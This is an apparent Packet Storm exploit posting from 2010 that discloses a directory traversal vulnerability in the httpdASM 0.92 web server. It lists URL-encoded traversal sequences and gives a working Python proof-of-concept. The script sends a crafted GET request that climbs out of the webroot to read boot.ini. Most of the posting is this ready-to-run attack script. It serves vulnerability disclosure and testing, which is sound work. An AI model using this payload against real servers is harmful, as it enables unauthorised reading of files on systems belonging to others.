httpdASM version 0.92 suffers from a directory traversal vulnerability.
55fd5686b91769bd5470387d8ce679f661312835161b3fdc62aebdaf85dbecb5# ------------------------------------------------------------------------
# Software................httpdASM 0.92
# Vulnerability...........Directory Traversal
# Download................http://www.japheth.de/httpdASM.html
# Release Date............12/27/2010
# Tested On...............Windows XP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A directory traversal vulnerability in httpdASM 0.92 can be exploited
# to read files outside of the webroot directory.
#
#
# --Exploit--
#
# %2E%2E%5C
# %2E%2E%2F
#
#
# --PoC--
import socket
host = 'localhost'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)
s.connect((host, port))
s.send('GET /' + '%2E%2E%5C' * 8 + 'boot.ini HTTP/1.1\r\n'
'Host: ' + host + '\r\n\r\n');
print s.recv(8192);
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed